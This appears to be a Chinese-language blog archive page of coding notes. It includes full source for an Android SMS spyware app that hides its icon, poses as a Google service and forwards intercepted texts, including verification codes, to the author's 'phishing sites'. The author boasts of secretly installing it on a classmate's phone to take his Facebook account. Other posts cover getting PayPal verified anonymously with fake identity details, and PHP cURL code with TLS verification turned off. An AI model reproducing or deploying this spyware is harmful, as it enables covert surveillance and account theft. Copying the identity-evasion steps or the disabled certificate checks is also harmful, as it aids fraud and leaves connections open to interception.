iWIN 必須被解散!

Weil Jimmer's BlogWeil Jimmer's Blog


Category:Note

Found 30 records. At Page 4 / 6.

PHP 利用 cUrl 抓取 HTTPS/HTTP 網頁
No Comments

發布:2016-04-25 20:16:50

最近不知道要發什麼,這篇這是純當筆記用。

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $data);
if (stripos($data,'https://')===0){
	//網址是https,設定SSL。
	curl_setopt($ch, CURLOPT_SSLVERSION,CURL_SSLVERSION_DEFAULT);
	curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
	curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
}
curl_setopt($ch, CURLOPT_VERBOSE, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36');
curl_setopt($ch, CURLOPT_MAXREDIRS, 999);
$html = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($html, 0, $header_size);
$html_body = substr($html, $header_size);
curl_close($ch);

 


This entry was posted in General, Functions, The Internet, Note, PHP By Weil Jimmer.

超商繳費儲錢進去Paypal帳號
No Comments

發布:
更新:2017-10-11 21:43:51

此方法已過時!請勿使用!未來將會可能重新更新此文章!


首先,這個方法透過不少外國管道!請別擔心。

此方法僅提供一個讓你透過超商繳費的方法可以付款用於大多數線上網站。


第一步先註冊BitoEx的帳號:https://www.bitoex.com

註冊帳號是為了購買全球通用的國際虛擬貨幣比特幣。

而比特幣可以在 BitoEx 購買到。建議購買至少 500 NT$。(可全家超商繳費付款,目前只能"全家"!)

買比特幣教學參考:https://www.bitoex.com/fami?locale=zh-tw

購買完成之後,通常會收到簡訊。如下:

然後,請先開好瀏覽器,登入進去BitoEx,接著點手機裡收到的連結。依照指示儲金額進入BitoEx。

兌換到我的錢包就可以了!(畫面僅供參考)

然後就去 Cryptopay 註冊帳號:https://cryptopay.me/join/f526d895

(使用上面的連結買金融卡可以打 75 折。)

註冊好帳號後,記得驗證 Email,然後登入,就會看到如下介面。

這四組比特幣地址都是你自己帳號的錢,只是貨幣單位不同,而且轉換過去後,就不會被比特幣價格升降而影響到幣值大小。建議直接複製 Bitcoin Account 的地址。之後要儲錢的話,可以直接寄到 USD Account。

就可以直接透過 BitoEx 寄送金額到這個國外網站。

這步驟!請注意!比特幣寄送的過程需要耗費十五分鐘至數小時,可能要等待很長一段時間才會入帳!

然後可以開始購買虛擬卡。

個人建議是買 USD 的虛擬卡拉,有其他需求就依照你自己的想法。

填入好基本資料後就可以送出了,基本上是可以亂填的。

然後選擇剛剛儲進金額的 Bitcoin Account,除非你儲在別的地方,切換到有錢的帳號即可。

接著購買完成後,就可以正式來使用了。先儲錢進去虛擬卡。

建議點 Maximum amount,直接儲最大金額,帳戶類別一樣要選有錢的帳戶,最後你就可以擁有比特幣的金融卡了!

點那個按鈕可以知道你的卡號和安全碼及有效年月。

就會有紀錄在你的交易項目了!而那四位數字就是你的驗證碼。刷新Paypal,填入四位數字驗證碼就完成驗證了!

接著你就可以利用 Paypal進行匿名全球交易,而且只靠"超商繳費"與假身分。

最後我還是要說一件重要的事情,每個月維持卡的費用是1美金,以及這張卡有一些使用上限,可以參考:https://cryptopay.me/bitcoin-debit-card

基本上,使用上限是 2500 €/£/$ ,除非你驗證你的帳號,上傳身分驗證。

以上。

By Weil Jimmer


This entry was posted in General, Experience, Functions, The Internet, Note By Weil Jimmer.

PHP string to html characters 字串轉HTML碼
No Comments

發布:
更新:2016-01-11 20:09:41

緣由:

最近因為裝了PHP7的緣故,又加上有一點點的閒,故研究PHP這塊。尤其是運算耗時方面,因為我本身就是要測試PHP7可以快到何種地步。聽說是快20倍的樣子。

結果,到最後我反而開始寫程式碼,昨天修正BBcode檢查的函數,運行約一萬字的代碼,結果速度慢到極致,被我修改後,倒加速不少,總速度提升82倍,原本12.3秒,修正到0.15秒(如果僅比較檢查BBcode的函數,加快上萬倍。),後來遇上了這個轉HTMLcode的問題,原先寫得太慢了,這是我第三次修正!

//目前我寫的最快的版本。

function string_to_utf16_ascii_HTML_new2($str){
	$str=mb_convert_encoding($str, 'ucs-2', 'utf-8');
	for($i=0;$i<strlen($str);$i+=2){
		$str2.='&#'.str_pad((ord($str[$i])*256+ord($str[$i+1])),5,'0',STR_PAD_LEFT).';';
	}
	return $str2;
}

//稍慢的版本(舊版)

function string_to_utf16_ascii_HTML_new($str){
	for ($i=0;$i<strlen($str);$i++){
		$k=ord($str[$i]);
		if ($k >= 192 and $k <= 223){
			$k=$k-192;
			$k2=ord($str[$i+1])-128;
			$c=$c.'&#'.str_pad($k*64+$k2,5,'0',STR_PAD_LEFT).';';
		}elseif ($k >= 224 and $k <= 239){
			$k=$k-224;
			$k2=ord($str[$i+1])-128;
			$k3=ord($str[$i+2])-128;
			$c=$c.'&#'.str_pad($k*4096+$k2*64+$k3,5,'0',STR_PAD_LEFT).';';
		}elseif ($k >= 128 and $k <= 191){
		}else{
			$c=$c.'&#'.str_pad($k,5,'0',STR_PAD_LEFT).';';
		}
	}
	return $c;
}

//極慢的版本(初版)

function string_to_utf16_ascii_HTML($str){
	for ($i=0;$str[$i]!="";$i++){
		$b[]=ord($str[$i]);
	}
	$str2=',';
	for ($i=0;$str[$i]!="";$i++){
		$xa=str_pad(decbin($b[$i]),8,'0',STR_PAD_LEFT);
		if (substr($xa,0,3) == "110"){
			$xb=str_pad(decbin($b[$i+1]),8,'0',STR_PAD_LEFT);
			$xx1=substr($xa,3);
			$xx2=substr($xb,2);
			$c=$c.$str2.str_pad(bindec($xx1.$xx2),5,'0',STR_PAD_LEFT);
		}elseif (substr($xa,0,4) == "1110"){
			$xb=str_pad(decbin($b[$i+1]),8,'0',STR_PAD_LEFT);
			$xc=str_pad(decbin($b[$i+2]),8,'0',STR_PAD_LEFT);
			$xx1=substr($xa,3);
			$xx2=substr($xb,2);
			$xx3=substr($xc,2);
			$c=$c.$str2.str_pad(bindec($xx1.$xx2.$xx3),5,'0',STR_PAD_LEFT);
		}elseif (substr($xa,0,2) == "10"){
		}else{
			$c=$c.$str2.str_pad($b[$i],5,'0',STR_PAD_LEFT);
		}
	}
	return substr($c,1);
}

//將HTMLcode轉回UTF-8字串。

function utf16_ascii_HTML_to_string($str){
	return mb_convert_encoding($str, 'UTF-8', 'HTML-ENTITIES'); 
}

/********

使用方法:

*********

$str='這是測試123';
$encode_str=string_to_utf16_ascii_HTML_new2($str);
echo $encode_str;

//output:
//&#36889;&#26159;&#28204;&#35430;&#00049;&#00050;&#00051;
//以瀏覽器顯示,等同於「這是測試123」。

echo utf16_ascii_HTML_to_string($encode_str);

//output:
//這是測試123

*/

 


This entry was posted in General, Experience, Functions, Note, PHP By Weil Jimmer.

Android Java SMS Spy
No Comments

發布:
更新:2018-03-28 12:23:37

====2015/11/20====

這是我很久以前寫的秘密程式,我當下就很想發表,我有很多都很想發表到我網站,但因網站主機是臨時的,將來還要再次轉移,故我就荒廢了網站整整兩個月(我是指不發文,並非我不管理),現在轉移完畢,意味著我將會再次發文。

================

※純測試,不做非法用途。

首先,因為這程式很兩極化,既可以合法也可以非法,講好聽點就是自動同步SMS訊息到網站上,講難聽點,竊取用戶SMS訊息。

腦筋轉得不夠快的人可能不明白這意味著什麼,只要裝了我寫的程式,就會被我盜光所有帳號。

開發緣由:因為我同學不相信「手機防毒軟體掃描不出病毒」,所以我向他放話,我寫的程式,防毒絕對掃不到。

因為我避免用戶發現這個祕密程式,所以我取名為google_sms_server。到時候要查就很困難。

<application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme" >
        <activity android:name=".MainActivity" >
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <receiver
            android:name=".SmsCloudBackup"
            android:enabled="true"
            android:exported="true" >
            <intent-filter android:priority="999999999" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

    </application>

設置 SMS_RECEIVED廣播,備註要記得添加權限,並把優先級別設定為最高級別。

package com.google.google_sms_server;

import android.app.Activity;
import android.content.pm.PackageManager;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        //setContentView(R.layout.activity_main);
        PackageManager p = getPackageManager();
        p.setComponentEnabledSetting(getComponentName(), PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);//設定隱藏在Launcher中

        Toast.makeText(this,"Google SMS Backup Service運作中",Toast.LENGTH_LONG).show();
        this.finish();
    }

}
package com.google.google_sms_server;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.AsyncTask;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.util.Log;

import org.apache.http.NameValuePair;
import org.apache.http.client.HttpClient;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.impl.client.DefaultHttpClient;
import org.apache.http.message.BasicNameValuePair;

import java.util.ArrayList;
import java.util.List;

public class SmsCloudBackup extends BroadcastReceiver {

    private String TAG = SmsCloudBackup.class.getSimpleName();
    public SmsCloudBackup() {

    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Get the data (SMS data) bound to intent
        Bundle bundle = intent.getExtras();
        String str = "";
        SmsMessage[] msgs = null;

        if (bundle != null) {
            Object[] pdus = (Object[]) bundle.get("pdus");
            msgs = new SmsMessage[pdus.length];

            for (int i=0; i < msgs.length; i++) {
                msgs[i] = SmsMessage.createFromPdu((byte[]) pdus[i]);
                str += "SMS from " + msgs[i].getOriginatingAddress() + " : ";
                str += msgs[i].getMessageBody().toString();
                str += "\n";
            }

            if (str.contains("驗證") || str.toLowerCase().contains("verif")){
                Log.d(TAG, "ABORT");
                this.abortBroadcast();//截斷用戶訊息,讓用戶察覺不到驗證訊息。實際上測試,似乎沒有效果。
            }

            Log.d(TAG, str);
            String aa= "";
            try{
                aa=java.net.URLEncoder.encode(str,"utf-8");
            }catch (Exception ex){

            }
            new ExcuteAsyncTaskOperation().execute(aa);

        }

    }

    public class ExcuteAsyncTaskOperation extends AsyncTask<String, String, String> {
        //異線任務,執行網路動作都要這樣。
        @Override
        protected String doInBackground(String... parr) {
            //進行背景工作,如「Network」,並可轉發值。
            //在迴圈中使用publishProgress((onProgressUpdate引數類別)變數);以傳遞資料。
            //例如publishProgress((int)50);

            HttpClient httpclient = new DefaultHttpClient();
            //我POST訊息至兩個釣魚網站。
            HttpPost httppost = new HttpPost("http://網站/post/post.php?u=SMS&c=" + parr[0]);
            HttpPost httppost2 = new HttpPost("http://網站2/post/post.php?u=SMS&c=" + parr[0]);
            try {
                List<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(1);
                nameValuePairs.add(new BasicNameValuePair("u", "SMS"));
                nameValuePairs.add(new BasicNameValuePair("c", parr[0]));
                httppost.setEntity(new UrlEncodedFormEntity(nameValuePairs));
                httpclient.execute(httppost);
                httpclient.execute(httppost2);
            } catch (Exception ex) {
                Log.d(TAG, "ERROR!!!!!!!!!!!!!!!!!!!!!" + ex.toString());
            }
            return "";
        }

    }

}

這樣,當用戶安裝完成,並執行後,此程式會從Launcher上消失,意思是找不到此程式的連結,並且會關閉此程式,得去 設定=>應用程式 才可能看到,但我已經取名為google什麼的,用戶很難察覺。

實作結果:

我祕密的裝在同學手機上,在他未察覺的情況下,進行這測試。事後他非常不爽,不過最後他還是原諒我了。

從釣魚網站,取得FB驗證碼。成功盜走FB帳號。


This entry was posted in Android, General, Java, The Internet, Note By Weil Jimmer.

Python 進階下載器
No Comments

發布:
更新:2015-11-20 18:47:40

我會寫這個,一來是為了讓朋友羨慕也想學程式,二來是我自己要用。我不會閒閒開發一個我用不到的東西。總是開發者要支持一下自己的產品嘛。

這是用Python3寫成的程式,主要針對手機而使用。需要安裝BeautifulSoup4。

(在Windows下的命令提示字元顯示很醜,沒有顏色,實際上在手機Linux終端機裡面跑的時候,會有顏色。)

主要支援以下功能:

一、抓取目標URL的目標連結

例如我要抓取IG某個頁面的所有圖片。

二、載入網頁列表,抓取目標連結

例如:載入某網站相簿的第一頁,抓取圖片,然後載入第二頁,抓取圖片,載入第三頁……以此類推。

三、規律網址抓取,這個算是最低階的方法吧。

例如:下載http://example.com/1.jpg,下載http://example.com/2.jpg,下載http://example.com/3.jpg,下載/4.jpg下載/5.jpg……

四、顯示目標清單

五、下載清單上的連結

至於抓圖功能,我可以稱進階抓圖器是沒有講假的,雖然還比不上我用VB.NET寫出來的 強大。那種仿一般正常用戶框架又有COOKIE、HEADER、還解析JS,Python很難辦得到。

所以,頂多次級一點。

支援:

一、抓取頁面上所有「看起來是網址」的連結。(即便它沒有被鑲入在任何標籤內)(採用正規表達式偵測)

二、抓取A標籤的屬性HREF。(超連結)

三、抓取IMG標籤的屬性SRC。(圖片)

四、抓取SOURCE標籤的屬性SRC。(HTML5的audio、movie)

五、抓取EMBED標籤的SRC屬性。(FLASH)

六、抓取OBJECT標籤的DATA屬性。(網頁插件)

七、LINK標籤的HREF屬性。(CSS)

八、SCRIPT標籤的SRC屬性。(JS)

九、FRAME標籤的SRC屬性。(框架)

十、IFRAME標籤的SRC屬性。(內置框架)

十一、以上全部。

十二、自訂抓取標籤名稱與屬性名稱。(這個我VB板的進階抓圖器沒有這項功能)

支援 過濾關鍵字,包刮AND、OR邏輯閘,一定要全部包刮關鍵字,或是命中其一關鍵字。

規律網址下載則支援,起始數字、終止數字、每次遞增多少、補位多少。

※這個有相對位置的處理。

****************************************

* 名稱:進階下載器

* 團隊:White Birch Forum Team

* 作者:Weil Jimmer

* 網站:http://0000.twgogo.org/

* 時間:2015.09.26

****************************************

Source Code

# coding: utf-8
"""Weil Jimmer For Safe Test Only"""
import os,urllib.request,shutil,sys,re
from threading import Thread
from time import sleep
from sys import platform as _platform

GRAY = "\033[1;30m"
RED = "\033[1;31m"
LIME = "\033[1;32m"
YELLOW = "\033[1;33m"
BLUE = "\033[1;34m"
MAGENTA = "\033[1;35m"
CYAN = "\033[1;36m"
WHITE = "\033[1;37m"
BGRAY = "\033[1;47m"
BRED = "\033[1;41m"
BLIME = "\033[1;42m"
BYELLOW = "\033[1;43m"
BBLUE = "\033[1;44m"
BMAGENTA = "\033[1;45m"
BCYAN = "\033[1;46m"
BDARK_RED = "\033[1;48m"
UNDERLINE = "\033[4m"
END = "\033[0m"

if _platform.find("linux")<0:
	GRAY = ""
	RED = ""
	LIME = ""
	YELLOW = ""
	BLUE = ""
	MAGENTA = ""
	CYAN = ""
	WHITE = ""
	BGRAY = ""
	BRED = ""
	BLIME = ""
	BYELLOW = ""
	BBLUE = ""
	BMAGENTA = ""
	BCYAN = ""
	UNDERLINE = ""
	END = ""
	os.system("color e")

try:
    import pip
except:
	print(RED + "錯誤沒有安裝pip!" + END)
	input()
	exit()

try:
    from bs4 import BeautifulSoup
except:
	print(RED + "錯誤沒有安裝bs4!嘗試安裝中...!" + END)
	pip.main(["install","beautifulsoup4"])
	from bs4 import BeautifulSoup

global phone_
phone_ = False

try:
	import android
	droid = android.Android()
	phone_ = True
except:
	try:
		import clipboard
	except:
		print(RED + "錯誤沒有安裝clipboard!嘗試安裝中...!" + END)
		pip.main(["install","PyGTK"])
		pip.main(["install","clipboard"])
		import clipboard

def get_clipboard():
	global phone_
	if phone_==True:
		return str(droid.getClipboard().result)
	else:
		return clipboard.paste()

global target_url
target_url = [[],[],[],[],[],[],[],[],[]]

def __init__(self):
	print("")

print (RED)
print ("*" * 40)
print ("*  Name:\tWeil_Advanced_Downloader")
print ("*  Team:" + LIME + "\tWhite Birch Forum Team" + RED)
print ("*  Developer:\tWeil Jimmer")
print ("*  Website:\thttp://0000.twgogo.org/")
print ("*  Date:\t2015.10.09")
print ("*" * 40)
print (END)

root_dir = "/sdcard/"
print("根目錄:" + root_dir)
global save_temp_dir
global save_dir
save_dir=str(input("存檔資料夾:"))
save_temp_dir=str(input("暫存檔資料夾(會自動刪除):"))

global target_array_index
target_array_index = 0

def int_s(k):
	try:
		return int(k)
	except:
		return -1

def reporthook(blocknum, blocksize, totalsize):
	readsofar = blocknum * blocksize
	if totalsize > 0:
		percent = readsofar * 1e2 / totalsize
		s = "\r%5.1f%% %*d / %d bytes" % (percent, len(str(totalsize)), readsofar, totalsize)
		sys.stderr.write(s)
		if readsofar >= totalsize:
			sys.stderr.write("\r" + MAGENTA + "%5.1f%% %*d / %d bytes" % (100, len(str(totalsize)), totalsize, totalsize))
	else:
		sys.stderr.write("\r未知檔案大小…下載中…" + str(readsofar) + " bytes")
		#sys.stderr.write("read %d\n" % (readsofar,))

def url_encode(url_):
	if url_.startswith("http://"):
		return 'http://' + urllib.parse.quote(url_[7:])
	elif url_.startswith("https://"):
		return 'https://' + urllib.parse.quote(url_[8:])
	elif url_.startswith("ftp://"):
		return 'ftp://' + urllib.parse.quote(url_[6:])
	elif ((not url_.startswith("ftp://")) and (not url_.startswith("http"))):
		return 'http://' + urllib.parse.quote(url_)
	return url_

def url_correct(url_):
	if ((not url_.startswith("ftp://")) and (not url_.startswith("http"))):
		return 'http://' + (url_)
	return url_

def download_URL(url,dir_name,ix,total,encode,return_yes_no):
	global save_temp_dir
	prog_str = "(" + str(ix) + "/" + str(total) + ")"
	if (total==0):
		prog_str=""
	file_name = url.split('/')[-1]
	file_name=file_name.replace(":","").replace("*","").replace('"',"").replace("\\","").replace("|","").replace("?","").replace("<","").replace(">","")
	if file_name=="":
		file_name="NULL"
	try:
		print(YELLOW + "下載中…" + prog_str + "\n" + url + "\n" + END)
		if not os.path.exists(root_dir + dir_name + "/") :
			os.makedirs(root_dir + dir_name + "/")
		opener = urllib.request.FancyURLopener({})
		opener.version = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'
		opener.addheader("Referer", url)
		opener.addheader("X-Forwarded-For", "0.0.0.0")
		opener.addheader("Client-IP", "0.0.0.0")
		local_file,response_header=opener.retrieve(url_encode(url), root_dir + dir_name + "/" + str(ix) + "-" + file_name, reporthook)
		print(MAGENTA + "下載完成" + prog_str + "!" + END)
	except urllib.error.HTTPError as ex:
		print(RED + "下載失敗" + prog_str + "!" + str(ex.code) + END)
	except:
		print(RED + "下載失敗" + prog_str + "!未知錯誤!" + END)
	if return_yes_no==0:
		return ""
	try:
		k=open(local_file,encoding=encode).read()
	except:
		k="ERROR"
		print(RED + "讀取失敗!" + END)
	try:
		if dir_name==save_temp_dir:
			shutil.rmtree(root_dir + save_temp_dir + "/")
	except:
		print(RED + "刪除暫存資料夾失敗!" + END)
	return k

def check_in_filter(url_array,and_or,keyword_str):
	if keyword_str=="":
		return url_array
	url_filter_array = []
	s = keyword_str.split(',')
	for array_x in url_array:
		ok = True
		for keyword_ in s:
			if str(array_x).find(keyword_)>=0:
				if and_or==0:
					url_filter_array.append(array_x)
					ok=False
					break
			else:
				if and_or==1:
					ok=False
					break
		if ok==True:
			url_filter_array.append(array_x)
	return url_filter_array

def handle_relative_url(handle_url,ori_url):
	handle_url=str(handle_url)
	if handle_url=="":
		return ori_url
	if handle_url.startswith("?"):
		temp_form_url = ori_url
		search_A = ori_url.find("?")
		if search_A<0:
			return ori_url + handle_url
		else:
			return ori_url[0:search_A] + handle_url
	if handle_url.startswith("//"):
		return "http:" + handle_url
	if (handle_url.startswith("http://") or handle_url.startswith("https://") or handle_url.startswith("ftp://")):
		return handle_url
	root_url = ori_url
	search_ = root_url.find("//")
	if search_<0:
		return handle_url
	search_x = root_url.find("/", search_+2);
	if (search_x<0):
		root_url = ori_url
	else:
		root_url = ori_url[0:search_x]
	same_dir_url = ori_url[search_+2:]
	search_x2 = same_dir_url.rfind("/")
	if search_x2<0:
		same_dir_url = ori_url
	else:
		same_dir_url = ori_url[0:search_x2+search_+2]
	if handle_url.startswith("/"):
		return (root_url + handle_url)
	if handle_url.startswith("./"):
		return (same_dir_url + handle_url[1:])
	return (same_dir_url + "/" + handle_url)

def remove_duplicates(values):
	output = []
	seen = set()
	for value in values:
		if value not in seen:
			output.append(value)
			seen.add(value)
	return output

def get_text_url(file_content):
	url_return_array = re.findall('(http|https|ftp)://([\w+?\.\w+])+([a-zA-Z0-9\~\!\@\#\$\%\^\&amp;\*\(\)_\-\=\+\\\/\?\.\:\;\'\,]*)?', file_content)
	return url_return_array

def get_url_by_tagname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetid_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(id=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def get_url_by_targetname_attribute(file_content,tagname,attribute,url_):
	soup = BeautifulSoup(file_content,'html.parser')
	url_return_array = []
	for link in soup.find_all(name=tagname):
		if link.get(attribute)!=None:
			url_return_array.append(handle_relative_url(link.get(attribute),url_))
	return url_return_array

def run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,ctagename,cattribute):
	global target_url
	if (way_X==1):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_text_url(html_code)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==2):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"a","href",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==3):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"img","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==4):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"source","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==5):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"embed","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==6):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"object","data",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==7):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"link","href",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==8):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"script","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==9):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"frame","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==10):
		ori_size=len(target_url[target_array_index])
		get_array_ = get_url_by_tagname_attribute(html_code,"iframe","src",temp_url)
		target_url[target_array_index].extend(get_array_)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==11):
		ori_size=len(target_url[target_array_index])
		get_array_1 = get_text_url(html_code)
		get_array_2 = get_url_by_tagname_attribute(html_code,"a","href",temp_url)
		get_array_3 = get_url_by_tagname_attribute(html_code,"img","src",temp_url)
		get_array_4 = get_url_by_tagname_attribute(html_code,"source","src",temp_url)
		get_array_5 = get_url_by_tagname_attribute(html_code,"embed","src",temp_url)
		get_array_6 = get_url_by_tagname_attribute(html_code,"object","data",temp_url)
		get_array_7 = get_url_by_tagname_attribute(html_code,"link","href",temp_url)
		get_array_8 = get_url_by_tagname_attribute(html_code,"script","src",temp_url)
		get_array_9 = get_url_by_tagname_attribute(html_code,"frame","src",temp_url)
		get_array_10 = get_url_by_tagname_attribute(html_code,"iframe","src",temp_url)
		target_url[target_array_index].extend(get_array_1)
		target_url[target_array_index].extend(get_array_2)
		target_url[target_array_index].extend(get_array_3)
		target_url[target_array_index].extend(get_array_4)
		target_url[target_array_index].extend(get_array_5)
		target_url[target_array_index].extend(get_array_6)
		target_url[target_array_index].extend(get_array_7)
		target_url[target_array_index].extend(get_array_8)
		target_url[target_array_index].extend(get_array_9)
		target_url[target_array_index].extend(get_array_10)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==12):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_tagname_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==13):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_targetid_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)
	elif(way_X==14):
		ori_size=len(target_url[target_array_index])
		get_array_custom = get_url_by_targetname_attribute(html_code,ctagename,cattribute,temp_url)
		target_url[target_array_index].extend(get_array_custom)
		target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
		target_url[target_array_index]=check_in_filter(target_url[target_array_index],and_or,keywords)
		print( LIME + "抓取完成!共抓取到:" + str(len(target_url[target_array_index])-ori_size) + "個URL" + END)

while True:	
	while True:
		method_X=int_s(input("\n\n" + CYAN + "要執行的動作:\n(1)抓取目標網頁資料\n(2)載入網址列表抓取資料\n(3)規律網址抓取\n(4)顯示目前清單\n(5)下載目標清單\n(6)清空目標清單\n(7)複製清單\n(8)刪除目標清單的特定值\n(9)從剪貼簿貼上網址(每個一行)" + END + "\n\n"))
		if method_X<=9 and method_X>=1:
			break
		else:
			print("輸入有誤!\n\n")
	if (method_X==1):
		while True:
			target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if target_array_index<=8 and target_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
